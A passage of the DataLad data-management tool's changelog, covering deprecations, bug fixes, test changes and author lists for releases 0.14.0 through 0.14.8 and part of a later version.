`#5564 <https://github.com/datalad/datalad/issues/5564>`__)\n\n- Several features and comments have been moved to the\n ``datalad-deprecated`` package. This package must now be installed to\n be able to use keep using this functionality.\n\n - The ``publish`` command. Use ``push`` instead.\n (`#5837 <https://github.com/datalad/datalad/issues/5837>`__)\n\n - The ``ls`` command.\n (`#5569 <https://github.com/datalad/datalad/issues/5569>`__)\n\n - The web UI that is deployable via ``datalad create-sibling --ui``.\n (`#5555 <https://github.com/datalad/datalad/issues/5555>`__)\n\n - The “automagic IO” feature.\n (`#5577 <https://github.com/datalad/datalad/issues/5577>`__)\n\n- ``AnnexRepo.copy_to()`` has been deprecated. The ``push`` command\n should be used instead.\n (`#5560 <https://github.com/datalad/datalad/issues/5560>`__)\n\n- ``AnnexRepo.sync()`` has been deprecated.\n ``AnnexRepo.call_annex(['sync', ...])`` should be used instead.\n (`#5461 <https://github.com/datalad/datalad/issues/5461>`__)\n\n- All ``GitRepo.*_submodule()`` methods have been deprecated and will\n be removed in a future release.\n (`#5559 <https://github.com/datalad/datalad/issues/5559>`__)\n\n- ``create-sibling-github``\\ ’s ``--dryrun`` switch was deprecated, use\n ``--dry-run`` instead.\n (`#5551 <https://github.com/datalad/datalad/issues/5551>`__)\n\n- The ``datalad --pbs-runner`` option has been deprecated, use\n ``condor_run`` (or similar) instead.\n (`#5956 <https://github.com/datalad/datalad/issues/5956>`__)\n\nFixes\n-----\n\n- Prevent invalid declaration of a publication dependencies for\n ‘origin’ on any auto-detected ORA special remotes, when cloing from a\n RIA store. An ORA remote is now checked whether it actually points to\n the RIA store the clone was made from.\n (`#5415 <https://github.com/datalad/datalad/issues/5415>`__)\n\n- The ORA special remote implementation has received several fixes:\n\n - It can now handle HTTP redirects.\n (`#5792 <https://github.com/datalad/datalad/issues/5792>`__)\n\n - Prevents failure when URL-type annex keys contain the ‘/’\n character.\n (`#5823 <https://github.com/datalad/datalad/issues/5823>`__)\n\n - Properly support the specification of usernames, passwords and\n ports in ``ria+<protocol>://`` URLs.\n (`#5902 <https://github.com/datalad/datalad/issues/5902>`__)\n\n- It is now possible to specifically select the default (or generic)\n result renderer via ``datalad -f default`` and with that override a\n ``tailored`` result renderer that may be preconfigured for a\n particular command.\n (`#5476 <https://github.com/datalad/datalad/issues/5476>`__)\n\n- Starting with 0.14.0, original URLs given to ``clone`` were recorded\n in a subdataset record. This was initially done in a second commit,\n leading to inflation of commits and slowdown in superdatasets with\n many subdatasets. Such subdataset record annotation is now collapsed\n into a single commits.\n (`#5480 <https://github.com/datalad/datalad/issues/5480>`__)\n\n- ``run`` now longer removes leading empty directories as part of the\n output preparation. This was surprising behavior for commands that do\n not ensure on their own that output directories exist.\n (`#5492 <https://github.com/datalad/datalad/issues/5492>`__)\n\n- A potentially existing ``message`` property is no longer removed when\n using the ``json`` or ``json_pp`` result renderer to avoid undesired\n withholding of relevant information.\n (`#5536 <https://github.com/datalad/datalad/issues/5536>`__)\n\n- ``subdatasets`` now reports ``state=present``, rather than\n ``state=clean``, for installed subdatasets to complement\n ``state=absent`` reports for uninstalled dataset.\n (`#5655 <https://github.com/datalad/datalad/issues/5655>`__)\n\n- ``create-sibling-ria`` now executes commands with a consistent\n environment setup that matches all other command execution in other\n DataLad commands.\n (`#5682 <https://github.com/datalad/datalad/issues/5682>`__)\n\n- ``save`` no longer saves unspecified subdatasets when called with an\n explicit path (list). The fix required a behavior change of\n ``GitRepo.get_content_info()`` in its interpretation of ``None``\n vs. ``[]`` path argument values that now aligns the behavior of\n ``GitRepo.diff|status()`` with their respective documentation.\n (`#5693 <https://github.com/datalad/datalad/issues/5693>`__)\n\n- ``get`` now prefers the location of a subdatasets that is recorded in\n a superdataset’s ``.gitmodules`` record. Previously, DataLad tried to\n obtain a subdataset from an assumed checkout of the superdataset’s\n origin. This new default order is (re-)configurable via the\n ``datalad.get.subdataset-source-candidate-<priority-label>``\n configuration mechanism.\n (`#5760 <https://github.com/datalad/datalad/issues/5760>`__)\n\n- ``create-sibling-gitlab`` no longer skips the root dataset when ``.``\n is given as a path.\n (`#5789 <https://github.com/datalad/datalad/issues/5789>`__)\n\n- ``siblings`` now rejects a value given to ``--as-common-datasrc``\n that clashes with the respective Git remote.\n (`#5805 <https://github.com/datalad/datalad/issues/5805>`__)\n\n- The usage synopsis reported by ``siblings`` now lists all supported\n actions. (`#5913 <https://github.com/datalad/datalad/issues/5913>`__)\n\n- ``siblings`` now renders non-ok results to avoid silent failure.\n (`#5915 <https://github.com/datalad/datalad/issues/5915>`__)\n\n- ``.gitattribute`` file manipulations no longer leave the file without\n a trailing newline.\n (`#5847 <https://github.com/datalad/datalad/issues/5847>`__)\n\n- Prevent crash when trying to delete a non-existing keyring credential\n field. (`#5892 <https://github.com/datalad/datalad/issues/5892>`__)\n\n- git-annex is no longer called with an unconditional ``annex.retry=3``\n configuration. Instead, this parameterization is now limited to\n ``annex get`` and ``annex copy`` calls.\n (`#5904 <https://github.com/datalad/datalad/issues/5904>`__)\n\n.. _tests-19:\n\nTests\n-----\n\n- ``file://`` URLs are no longer the predominant test case for\n ``AnnexRepo`` functionality. A built-in HTTP server now used in most\n cases. (`#5332 <https://github.com/datalad/datalad/issues/5332>`__)\n\n--------------\n\n0.14.8 (Sun Sep 12 2021)\n========================\n\n.. _bug-fix-17:\n\nBug Fix\n-------\n\n- BF: add-archive-content on .xz and other non-.gz stream compressed\n files `#5930 <https://github.com/datalad/datalad/pull/5930>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(UX): do not keep logging ERROR possibly present in progress\n records `#5936 <https://github.com/datalad/datalad/pull/5936>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Annotate datalad_core as not needing actual data – just uses annex\n whereis `#5971 <https://github.com/datalad/datalad/pull/5971>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: limit CMD_MAX_ARG if obnoxious value is encountered.\n `#5945 <https://github.com/datalad/datalad/pull/5945>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Download session/credentials locking – inform user if locking is\n “failing” to be obtained, fail upon ~5min timeout\n `#5884 <https://github.com/datalad/datalad/pull/5884>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Render siblings()’s non-ok results with the default renderer\n `#5915 <https://github.com/datalad/datalad/pull/5915>`__\n (`@mih <https://github.com/mih>`__)\n- BF: do not crash, just skip whenever trying to delete non existing\n field in the underlying keyring\n `#5892 <https://github.com/datalad/datalad/pull/5892>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Fix argument-spec for ``siblings`` and improve usage synopsis\n `#5913 <https://github.com/datalad/datalad/pull/5913>`__\n (`@mih <https://github.com/mih>`__)\n- Clarify error message re unspecified gitlab project\n `#5907 <https://github.com/datalad/datalad/pull/5907>`__\n (`@mih <https://github.com/mih>`__)\n- Support username, password and port specification in RIA URLs\n `#5902 <https://github.com/datalad/datalad/pull/5902>`__\n (`@mih <https://github.com/mih>`__)\n- BF: take path from SSHRI, test URLs not only on Windows\n `#5881 <https://github.com/datalad/datalad/pull/5881>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(UX): warn user if keyring returned a “null” keyring\n `#5875 <https://github.com/datalad/datalad/pull/5875>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(UX): state original purpose in NoDatasetFound exception + detail\n it for get `#5708 <https://github.com/datalad/datalad/pull/5708>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _pushed-to-maint-5:\n\nPushed to ``maint``\n-------------------\n\n- Merge branch ‘bf-http-headers-agent’ into maint\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF(BF?)+DOC: provide User-Agent to entire session headers + use those\n if provided (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-15:\n\nInternal\n--------\n\n- Pass ``--no-changelog`` to ``auto shipit`` if changelog already has\n entry `#5952 <https://github.com/datalad/datalad/pull/5952>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Add isort config to match current convention + run isort via\n pre-commit (if configured)\n `#5923 <https://github.com/datalad/datalad/pull/5923>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- .travis.yml: use python -m {nose,coverage} invocations, and always\n show combined report\n `#5888 <https://github.com/datalad/datalad/pull/5888>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Add project URLs into the package metadata for convenience links on\n Pypi `#5866 <https://github.com/datalad/datalad/pull/5866>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-20:\n\nTests\n-----\n\n- BF: do use OBSCURE_FILENAME instead of hardcoded unicode\n `#5944 <https://github.com/datalad/datalad/pull/5944>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): Skip testing for having PID listed if no psutil\n `#5920 <https://github.com/datalad/datalad/pull/5920>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): Boost version of git-annex to 8.20201129 to test an error\n message `#5894 <https://github.com/datalad/datalad/pull/5894>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-4-1:\n\nAuthors: 4\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.7 (Tue Aug 03 2021)\n========================\n\n.. _bug-fix-18:\n\nBug Fix\n-------\n\n- UX: When two or more clone URL templates are found, error out more\n gracefully `#5839 <https://github.com/datalad/datalad/pull/5839>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: http_auth - follow redirect (just 1) to re-authenticate after\n initial attempt\n `#5852 <https://github.com/datalad/datalad/pull/5852>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- addurls Formatter - provide value repr in exception\n `#5850 <https://github.com/datalad/datalad/pull/5850>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: allow for “patch” level semver for “master” branch\n `#5839 <https://github.com/datalad/datalad/pull/5839>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: Report info from annex JSON error message in CommandError\n `#5809 <https://github.com/datalad/datalad/pull/5809>`__\n (`@mih <https://github.com/mih>`__)\n- RF(TST): do not test for no EASY and pkg_resources in shims\n `#5817 <https://github.com/datalad/datalad/pull/5817>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- http downloaders: Provide custom informative User-Agent, do not claim\n to be “Authenticated access”\n `#5802 <https://github.com/datalad/datalad/pull/5802>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(UX,DX): inform user with a warning if version is 0+unknown\n `#5787 <https://github.com/datalad/datalad/pull/5787>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- shell-completion: add argcomplete to ‘misc’ extra_depends, log an\n ERROR if argcomplete fails to import\n `#5781 <https://github.com/datalad/datalad/pull/5781>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH (UX): add python-gitlab dependency\n `#5776 <https://github.com/datalad/datalad/pull/5776>`__\n ([email protected])\n\n.. _internal-16:\n\nInternal\n--------\n\n- BF: Fix reported paths in ORA remote\n `#5821 <https://github.com/datalad/datalad/pull/5821>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: import importlib.metadata not importlib_metadata whenever\n available `#5818 <https://github.com/datalad/datalad/pull/5818>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-21:\n\nTests\n-----\n\n- TST: set –allow-unrelated-histories in the mk_push_target setup for\n Windows `#5855 <https://github.com/datalad/datalad/pull/5855>`__\n (`@adswa <https://github.com/adswa>`__)\n- Tests: Allow for version to contain + as a separator and provide more\n information for version related comparisons\n `#5786 <https://github.com/datalad/datalad/pull/5786>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-4-2:\n\nAuthors: 4\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Stephan Heunis (`@jsheunis <https://github.com/jsheunis>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.6 (Sun Jun 27 2021)\n========================\n\n.. _internal-17:\n\nInternal\n--------\n\n- BF: update changelog conversion from .md to .rst (for sphinx)\n `#5757 <https://github.com/datalad/datalad/pull/5757>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _authors-2-1:\n\nAuthors: 2\n----------\n\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.5 (Mon Jun 21 2021)\n========================\n\n.. _bug-fix-19:\n\nBug Fix\n-------\n\n- BF(TST): parallel - take longer for producer to produce\n `#5747 <https://github.com/datalad/datalad/pull/5747>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- add –on-failure default value and document it\n `#5690 <https://github.com/datalad/datalad/pull/5690>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: harmonize “purpose” statements to imperative form\n `#5733 <https://github.com/datalad/datalad/pull/5733>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(TST): populate heavy tree with 100 unique keys (not just 1) among\n 10,000 `#5734 <https://github.com/datalad/datalad/pull/5734>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: do not use .acquired - just get state from acquire()\n `#5718 <https://github.com/datalad/datalad/pull/5718>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: account for annex now “scanning for annexed” instead of\n “unlocked” files\n `#5705 <https://github.com/datalad/datalad/pull/5705>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- interface: Don’t repeat custom summary for non-generator results\n `#5688 <https://github.com/datalad/datalad/pull/5688>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: just pip install datalad-installer\n `#5676 <https://github.com/datalad/datalad/pull/5676>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: addurls.extract: Drop mention of removed ‘stream’ parameter\n `#5690 <https://github.com/datalad/datalad/pull/5690>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5674 from kyleam/test-addurls-copy-fix\n `#5674 <https://github.com/datalad/datalad/pull/5674>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5663 from kyleam/status-ds-equal-path\n `#5663 <https://github.com/datalad/datalad/pull/5663>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5671 from kyleam/update-fetch-fail\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- BF: update: Honor –on-failure if fetch fails\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: update: Avoid fetch’s deprecated kwargs\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- CLN: update: Drop an unused import\n `#5671 <https://github.com/datalad/datalad/pull/5671>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5664 from kyleam/addurls-better-url-parts-error\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- Merge pull request #5661 from kyleam/sphinx-fix-plugin-refs\n `#5661 <https://github.com/datalad/datalad/pull/5661>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- BF: status: Provide special treatment of “this dataset” path\n `#5663 <https://github.com/datalad/datalad/pull/5663>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- BF: addurls: Provide better placeholder error for special keys\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: addurls: Simply construction of placeholder exception message\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: addurls._get_placeholder_exception: Rename a parameter\n `#5664 <https://github.com/datalad/datalad/pull/5664>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- RF: status: Avoid repeated Dataset.path access\n `#5663 <https://github.com/datalad/datalad/pull/5663>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- DOC: Reference plugins via datalad.api\n `#5661 <https://github.com/datalad/datalad/pull/5661>`__\n (`@kyleam <https://github.com/kyleam>`__)\n- download-url: Set up datalad special remote if needed\n `#5648 <https://github.com/datalad/datalad/pull/5648>`__\n (`@kyleam <https://github.com/kyleam>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _pushed-to-maint-6:\n\nPushed to ``maint``\n-------------------\n\n- MNT: Post-release dance (`@kyleam <https://github.com/kyleam>`__)\n\n.. _internal-18:\n\nInternal\n--------\n\n- Switch to versioneer and auto\n `#5669 <https://github.com/datalad/datalad/pull/5669>`__\n (`@jwodder <https://github.com/jwodder>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- MNT: setup.py: Temporarily avoid Sphinx 4\n `#5649 <https://github.com/datalad/datalad/pull/5649>`__\n (`@kyleam <https://github.com/kyleam>`__)\n\n.. _tests-22:\n\nTests\n-----\n\n- BF(TST): skip testing for showing “Scanning for …” since not shown if\n too quick `#5727 <https://github.com/datalad/datalad/pull/5727>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Revert “TST: test_partial_unlocked: Document and avoid recent\n git-annex failure”\n `#5651 <https://github.com/datalad/datalad/pull/5651>`__\n (`@kyleam <https://github.com/kyleam>`__)\n\n.. _authors-4-3:\n\nAuthors: 4\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Kyle Meyer (`@kyleam <https://github.com/kyleam>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.14.4 (May 10, 2021) – .\n=========================\n\n.. _fixes-1:\n\nFixes\n-----\n\n- Following an internal call to ``git-clone``,\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n assumed that the remote name was “origin”, but this may not be the\n case if ``clone.defaultRemoteName`` is configured (available as of\n Git 2.30).\n (`#5572 <https://github.com/datalad/datalad/issues/5572>`__)\n\n- Several test fixes, including updates for changes in git-annex.\n (`#5612 <https://github.com/datalad/datalad/issues/5612>`__)\n (`#5632 <https://github.com/datalad/datalad/issues/5632>`__)\n (`#5639 <https://github.com/datalad/datalad/issues/5639>`__)\n\n0.14.3 (April 28, 2021) – .\n===========================\n\n.. _fixes-2:\n\nFixes\n-----\n\n- For outputs that include a glob,\n `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n didn’t re-glob after executing the command, which is necessary to\n catch changes if ``--explicit`` or ``--expand={outputs,both}`` is\n specified.\n (`#5594 <https://github.com/datalad/datalad/issues/5594>`__)\n\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n now gives an error result rather than a warning when an input glob\n doesn’t match.\n (`#5594 <https://github.com/datalad/datalad/issues/5594>`__)\n\n- The procedure for creating a RIA store checks for an existing\n ria-layout-version file and makes sure its version matches the\n desired version. This check wasn’t done correctly for SSH hosts.\n (`#5607 <https://github.com/datalad/datalad/issues/5607>`__)\n\n- A helper for transforming git-annex JSON records into DataLad results\n didn’t account for the unusual case where the git-annex record\n doesn’t have a “file” key.\n (`#5580 <https://github.com/datalad/datalad/issues/5580>`__)\n\n- The test suite required updates for recent changes in PyGithub and\n git-annex.\n (`#5603 <https://github.com/datalad/datalad/issues/5603>`__)\n (`#5609 <https://github.com/datalad/datalad/issues/5609>`__)\n\n.. _enhancements-and-new-features-6:\n\nEnhancements and new features\n-----------------------------\n\n- The DataLad source repository has long had a tools/cmdline-completion\n helper. This functionality is now exposed as a command,\n ``datalad shell-completion``.\n (`#5544 <https://github.com/datalad/datalad/issues/5544>`__)\n\n0.14.2 (April 14, 2021) – .\n===========================\n\n.. _fixes-3:\n\nFixes\n-----\n\n- `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__\n now works bottom-up, pushing submodules first so that hooks on the\n remote can aggregate updated subdataset information.\n (`#5416 <https://github.com/datalad/datalad/issues/5416>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n didn’t ensure that the configuration of subdatasets was reloaded.\n (`#5552 <https://github.com/datalad/datalad/issues/5552>`__)\n\n0.14.1 (April 01, 2021) – .\n===========================\n\n.. _fixes-4:\n\nFixes\n-----\n\n- The recent default branch changes on GitHub’s side can lead to\n “git-annex” being selected over “master” as the default branch on\n GitHub when setting up a sibling with\n `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__.\n To work around this, the current branch is now pushed first.\n (`#5010 <https://github.com/datalad/datalad/issues/5010>`__)\n\n- The logic for reading in a JSON line from git-annex failed if the\n response exceeded the buffer size (256 KB on \\*nix systems).\n\n- Calling\n `unlock <http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html>`__\n with a path of “.” from within an untracked subdataset incorrectly\n aborted, complaining that the “dataset containing given paths is not\n underneath the reference dataset”.\n (`#5458 <https://github.com/datalad/datalad/issues/5458>`__)\n\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n didn’t account for the possibility of multiple accessible ORA remotes\n or the fact that none of them may be associated with the RIA store\n being cloned.\n (`#5488 <https://github.com/datalad/datalad/issues/5488>`__)\n\n- `create-sibling-ria <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html>`__\n didn’t call ``git update-server-info`` after setting up the remote\n repository and, as a result, the repository couldn’t be fetched until\n something else (e.g., a push) triggered a call to\n ``git update-server-info``.\n (`#5531 <https://github.com/datalad/datalad/issues/5531>`__)\n\n- The parser for git-config output didn’t properly handle multi-line\n values and got thrown off by unexpected and unrelated lines.\n (`#5509 <https://github.com/datalad/datalad/issues/5509>`__)\n\n- The 0.14 release introduced regressions in the handling of progress\n bars for git-annex actions, including collapsing progress bars for\n concurrent operations.\n (`#5421 <https://github.com/datalad/datalad/issues/5421>`__)\n (`#5438 <https://github.com/datalad/datalad/issues/5438>`__)\n\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n failed if the user configured Git’s ``diff.ignoreSubmodules`` to a\n non-default value.\n (`#5453 <https://github.com/datalad/datalad/issues/5453>`__)\n\n- A interprocess lock is now used to prevent a race between checking\n for an SSH socket’s existence and creating it.\n (`#5466 <https://github.com/datalad/datalad/issues/5466>`__)\n\n- If a Python procedure script is executable,\n `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n invokes it directly rather than passing it to ``sys.executable``. The\n non-executable Python procedures that ship with DataLad now include\n shebangs so that invoking them has a chance of working on file\n systems that present all files as executable.\n (`#5436 <https://github.com/datalad/datalad/issues/5436>`__)\n\n- DataLad’s wrapper around ``argparse`` failed if an underscore was\n used in a positional argument.\n (`#5525 <https://github.com/datalad/datalad/issues/5525>`__)\n\n.. _enhancements-and-new-features-7:\n\nEnhancements and new features\n-----------------------------\n\n- DataLad’s method for mapping environment variables to configuration\n options (e.g., ``DATALAD_FOO_X__Y`` to ``datalad.foo.x-y``) doesn’t\n work if the subsection name (“FOO”) has an underscore. This\n limitation can be sidestepped with the new\n ``DATALAD_CONFIG_OVERRIDES_JSON`` environment variable, which can be\n set to a JSON record of configuration values.\n (`#5505 <https://github.com/datalad/datalad/issues/5505>`__)\n\n0.14.0 (February 02, 2021) – .\n==============================\n\nMajor refactoring and deprecations\n----------------------------------\n\n- Git versions below v2.19.1 are no longer supported.\n (`#4650 <https://github.com/datalad/datalad/issues/4650>`__)\n\n- The minimum git-annex version is still 7.20190503, but, if you’re on\n Windows (or use adjusted branches in general), please upgrade to at\n least 8.20200330 but ideally 8.20210127 to get subdataset-related\n fixes. (`#4292 <https://github.com/datalad/datalad/issues/4292>`__)\n (`#5290 <https://github.com/datalad/datalad/issues/5290>`__)\n\n- The minimum supported version of Python is now 3.6.\n (`#4879 <https://github.com/datalad/datalad/issues/4879>`__)\n\n- `publish <http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html>`__\n is now deprecated in favor of\n `push <http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html>`__.\n It will be removed in the 0.15.0 release at the earliest.\n\n- A new command runner was added in v0.13. Functionality related to the\n old runner has now been removed: ``Runner``, ``GitRunner``, and\n ``run_gitcommand_on_file_list_chunks`` from the ``datalad.cmd``\n module along with the ``datalad.tests.protocolremote``,\n ``datalad.cmd.protocol``, and ``datalad.cmd.protocol.prefix``\n configuration options.\n (`#5229 <https://github.com/datalad/datalad/issues/5229>`__)\n\n- The ``--no-storage-sibling`` switch of ``create-sibling-ria`` is\n deprecated in favor of ``--storage-sibling=off`` and will be removed\n in a later release.\n (`#5090 <https://github.com/datalad/datalad/issues/5090>`__)\n\n- The ``get_git_dir`` static method of ``GitRepo`` is deprecated and\n will be removed in a later release. Use the ``dot_git`` attribute of\n an instance instead.\n (`#4597 <https://github.com/datalad/datalad/issues/4597>`__)\n\n- The ``ProcessAnnexProgressIndicators`` helper from\n ``datalad.support.annexrepo`` has been removed.\n (`#5259 <https://github.com/datalad/datalad/issues/5259>`__)\n\n- The ``save`` argument of\n `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__,\n a noop since v0.6.0, has been dropped.\n (`#5278 <https://github.com/datalad/datalad/issues/5278>`__)\n\n- The ``get_URLS`` method of ``AnnexCustomRemote`` is deprecated and\n will be removed in a later release.\n (`#4955 <https://github.com/datalad/datalad/issues/4955>`__)\n\n- ``ConfigManager.get`` now returns a single value rather than a tuple\n when there are multiple values for the same key, as very few callers\n correctly accounted for the possibility of a tuple return value.\n Callers can restore the old behavior by passing ``get_all=True``.\n (`#4924 <https://github.com/datalad/datalad/issues/4924>`__)\n\n- In 0.12.0, all of the ``assure_*`` functions in ``datalad.utils``\n were renamed as ``ensure_*``, keeping the old names around as\n compatibility aliases. The ``assure_*`` variants are now marked as\n deprecated and will be removed in a later release.\n (`#4908 <https://github.com/datalad/datalad/issues/4908>`__)\n\n- The ``datalad.interface.run`` module, which was deprecated in 0.12.0\n and kept as a compatibility shim for ``datalad.core.local.run``, has\n been removed.\n (`#4583 <https://github.com/datalad/datalad/issues/4583>`__)\n\n- The ``saver`` argument of ``datalad.core.local.run.run_command``,\n marked as obsolete in 0.12.0, has been removed.\n (`#4583 <https://github.com/datalad/datalad/issues/4583>`__)\n\n- The ``dataset_only`` argument of the ``ConfigManager`` class was\n deprecated in 0.12 and has now been removed.\n (`#4828 <https://github.com/datalad/datalad/issues/4828>`__)\n\n- The ``linux_distribution_name``, ``linux_distribution_release``, and\n ``on_debian_wheezy`` attributes in ``datalad.utils`` are no longer\n set at import time and will be removed in a later release. Use\n ``datalad.utils.get_linux_distribution`` instead.\n (`#4696 <https://github.com/datalad/datalad/issues/4696>`__)\n\n- ``datalad.distribution.clone``, which was marked as obsolete in v0.12\n in favor of ``datalad.core.distributed.clone``, has been removed.\n (`#4904 <https://github.com/datalad/datalad/issues/4904>`__)\n\n- ``datalad.support.annexrepo.N_AUTO_JOBS``, announced as deprecated in\n v0.12.6, has been removed.\n (`#4904 <https://github.com/datalad/datalad/issues/4904>`__)\n\n- The ``compat`` parameter of ``GitRepo.get_submodules``, added in\n v0.12 as a temporary compatibility layer, has been removed.\n (`#4904 <https://github.com/datalad/datalad/issues/4904>`__)\n\n- The long-deprecated (and non-functional) ``url`` parameter of\n ``GitRepo.__init__`` has been removed.\n (`#5342 <https://github.com/datalad/datalad/issues/5342>`__)\n\n.. _fixes-5:\n\nFixes\n-----\n\n- Cloning onto a system that enters adjusted branches by default (as\n Windows does) did not properly record the clone URL.\n (`#5128 <https://github.com/datalad/datalad/issues/5128>`__)\n\n- The RIA-specific handling after calling\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n was correctly triggered by ``ria+http`` URLs but not ``ria+https``\n URLs. (`#4977 <https://github.com/datalad/datalad/issues/4977>`__)\n\n- If the registered commit wasn’t found when cloning a subdataset, the\n failed attempt was left around.\n (`#5391 <https://github.com/datalad/datalad/issues/5391>`__)\n\n- The remote calls to ``cp`` and ``chmod`` in\n `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n were not portable and failed on macOS.\n (`#5108 <https://github.com/datalad/datalad/issues/5108>`__)\n\n- A more reliable check is now done to decide if configuration files\n need to be reloaded.\n (`#5276 <https://github.com/datalad/datalad/issues/5276>`__)\n\n- The internal command runner’s handling of the event loop has been\n improved to play nicer with outside applications and scripts that use\n asyncio. (`#5350 <https://github.com/datalad/datalad/issues/5350>`__)\n (`#5367 <https://github.com/datalad/datalad/issues/5367>`__)\n\n.. _enhancements-and-new-features-8:\n\nEnhancements and new features\n-----------------------------\n\n- The subdataset handling for adjusted branches, which is particularly\n important on Windows where git-annex enters an adjusted branch by\n default, has been improved. A core piece of the new approach is\n registering the commit of the primary branch, not its checked out\n adjusted branch, in the superdataset. Note: This means that\n ``git status`` will always consider a subdataset on an adjusted\n branch as dirty while ``datalad status`` will look more closely and\n see if the tip of the primary branch matches the registered commit.\n (`#5241 <https://github.com/datalad/datalad/issues/5241>`__)\n\n- The performance of the\n `subdatasets 